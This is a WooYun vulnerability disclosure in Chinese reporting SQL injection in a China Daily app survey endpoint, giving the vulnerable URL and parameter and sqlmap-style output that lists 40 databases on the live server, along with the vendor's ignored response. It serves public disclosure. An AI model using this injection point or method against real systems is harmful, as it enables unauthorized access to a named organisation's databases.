当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166587

漏洞标题:中国日报网APP注入(涉及40个数据库)

相关厂商:中国日报网

漏洞作者: 路人甲

提交时间:2016-01-01 09:18

修复时间:2016-01-10 09:00

公开时间:2016-01-10 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-01: 细节已通知厂商并且等待厂商处理中
2016-01-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

《中国日报》是中国国家英文日报,创刊于1981年,全球期均发行90余万份。
《中国日报》作为中国了解世界、世界了解中国的重要窗口,是国内外高端人士首选的中国英文媒体,是唯一有效进入国际主流社会、国外媒体转载率最高的中国报纸,也是国内承办大型国际会议会刊最多的媒体。
中国日报传媒集团紧贴时代脉搏,坚持创新驱动,秉持“内容为王”理念,说明中国、点评世界,不断加快海外发展步伐,完善全球采编和传播网络,向着构建世界一流的现代新型全媒体集团的目标迈进。

详细说明:

http://app1.chinadaily.com.cn/appdesk/vote/surveypre.shtml
mmid=248&name[]=1

漏洞证明:

[08:00:45] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5
[08:00:45] [INFO] fetching database names
[08:00:45] [INFO] fetching number of databases
[08:00:45] [INFO] resumed: 40
[08:00:45] [INFO] resumed: information_schema
[08:00:45] [INFO] resumed: 111
[08:00:45] [INFO] resumed: bbs
[08:00:45] [INFO] resumed: citylife
[08:00:45] [INFO] resumed: comment
[08:00:45] [INFO] resumed: contribute
[08:00:45] [INFO] resumed: cpc
[08:00:45] [INFO] resumed: fileupload
[08:00:45] [INFO] resumed: forum
[08:00:45] [INFO] resumed: language
[08:00:45] [INFO] resumed: media
[08:00:45] [INFO] resumed: metrolife
[08:00:45] [INFO] resumed: mhdasai
[08:00:45] [INFO] resumed: mhdasai_2006
[08:00:45] [INFO] resumed: mysql
[08:00:45] [INFO] resumed: news
[08:00:45] [INFO] resumed: olympics
[08:00:45] [INFO] resumed: olympics_cutdown
[08:00:45] [INFO] resumed: papershop
[08:00:45] [INFO] resumed: pdf
[08:00:45] [INFO] resumed: pdfold
[08:00:45] [INFO] resumed: phpeasyproject
[08:00:45] [INFO] resumed: sign
[08:00:45] [INFO] resumed: special
[08:00:45] [INFO] resumed: survey
[08:00:45] [INFO] resumed: survey_132
[08:00:45] [INFO] resumed: test
[08:00:45] [INFO] resumed: vote
[08:00:45] [INFO] resumed: webcast
[08:00:45] [INFO] resumed: weihe_en
[08:00:45] [INFO] resumed: wenchuan
[08:00:45] [INFO] resumed: wenchuan_en
[08:00:45] [INFO] resumed: wh_ezine
[08:00:45] [INFO] resumed: worldinfo
[08:00:45] [INFO] resumed: zgti
[08:00:45] [INFO] resumed: zp
[08:00:45] [INFO] resumed: zpdf
[08:00:45] [INFO] resumed: zsurvey
[08:00:45] [INFO] resumed: zsurvey_132
[08:00:45] [INFO] resumed: zvote
available databases [40]:
[*] `111`
[*] `language`
[*] bbs
[*] citylife
[*] comment
[*] contribute
[*] cpc
[*] fileupload
[*] forum
[*] information_schema
[*] media
[*] metrolife
[*] mhdasai
[*] mhdasai_2006
[*] mysql
[*] news
[*] olympics
[*] olympics_cutdown
[*] papershop
[*] pdf
[*] pdfold
[*] phpeasyproject
[*] sign
[*] special
[*] survey
[*] survey_132
[*] test
[*] vote
[*] webcast
[*] weihe_en
[*] wenchuan
[*] wenchuan_en
[*] wh_ezine
[*] worldinfo
[*] zgti
[*] zp
[*] zpdf
[*] zsurvey
[*] zsurvey_132
[*] zvote

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-10 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价